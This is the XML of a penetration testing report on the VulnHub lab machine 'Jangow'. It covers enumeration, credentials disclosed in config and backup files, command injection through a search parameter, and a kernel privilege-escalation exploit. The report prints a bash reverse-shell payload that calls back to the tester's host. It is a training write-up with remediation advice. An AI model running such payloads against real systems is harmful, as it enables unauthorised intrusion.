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05"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Penetration Testing Report</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Target Machine: Jangow (VulnHub)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Report Compiled By: Karandeep Singh Sehgal</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Date: 4 June 2025</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="689"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This report documents the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exploitation process of the "Jangow" machine from VulnHub. The machine was compromised through a local file inclusion vulnerability that allowed remote code execution and privilege escalation via a known kernel exploit. Full system compromise was achieved.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="689"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Target Information</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- IP Address: 192.168.56.118</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Services:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- FTP (Port 21)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- HTTP (Port 80)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="689"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Methodology</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Scanning and Enumeration</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Nmap Scan:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Discovered ports 21 (FTP) and 80 (HTTP)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Service versions not reliably identified</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Gobuster Scan:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Revealed "/site" directory on the web server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3.2 Web Enumeration</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- The `/site` directory had a vulnerable search functionality (`buscar=`) allowing Local File Inclusion (LFI)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Exploiting this revealed internal server paths and configuration files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3.3 Credentials Disclosure</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Found `config.php` file disclosing credentials:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Username: desafio02</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Password: abygurl69 (did not work for FTP)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Found a `.backup` file containing:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Username: jangow01</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Password: abygurl69 (valid for FTP)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="689"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Exploitation</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Remote Code Execution via LFI</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- The `buscar=` parameter accepted shell commands</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Payload used (URL-encoded):</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="690"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="741"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/192.168.56.1/4444 0&gt;&amp;1'</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="689"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Post-Exploitation Enumeration</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Ran `linpeas.sh` for privilege escalation checks</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Identified kernel vulnerability CVE-2017-16995</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="689"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Privilege Escalation</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Uploaded local exploit code (`45010.c`) via FTP</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Compiled exploit on target using `gcc`</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Gained root shell</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="689"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Post-Exploitation</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Flags Captured</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- User Flag:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="690"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User Flag</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="741"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">d41d8cd98f00b204e9800998ecf8427e</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="690"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Root Flag</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="741"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">da39a3ee5e6b4b0d3255bfef95601890afd80709</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="689"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Notable Files Used</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- `revshell.php`: Reverse shell script (upload attempt via FTP failed)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- `45010.c`: Kernel exploit source code</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="689"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Recommendations</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Sanitize Input: Properly sanitize user inputs to prevent LFI and RCE.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Patch System: Upgrade the kernel to patch known exploits like CVE-2017-16995.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Credential Hygiene: Avoid storing plaintext credentials in backup files.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- FTP Restrictions: Disable FTP upload or allow only for certain IPs with restricted write permissions.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="689"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Conclusion</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Jangow machine wa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s successfully exploited by chaining a local file inclusion vulnerability into a remote shell and leveraging a kernel vulnerability for full system compromise. The exercise demonstrates the importance of secure coding practices and regular system patching.</w:t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Courier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2025-06-04T21:05:49Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>